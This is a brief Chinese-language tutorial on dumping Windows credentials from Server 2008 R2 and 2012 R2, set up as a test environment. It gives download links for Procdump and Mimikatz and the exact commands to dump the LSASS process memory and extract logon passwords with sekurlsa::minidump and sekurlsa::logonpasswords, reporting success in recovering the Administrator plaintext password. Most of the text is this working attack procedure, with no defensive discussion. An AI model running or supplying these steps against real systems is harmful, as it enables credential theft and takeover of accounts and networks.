Procdump+Mimikatz获取Windows明文密码
1、 测试环境
系统:
Server 2008 R2
Server 2012 R2
工具:
Procdump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:https://github.com/gentilkiwi/mimikatz/releases
2、 抓取密码
2.1 Server 2008 R2抓取
2.1.1 生成存储文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.1.2 mimiakatz密码获取
cmd运行mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
如图:成功抓取到Administrator密码明文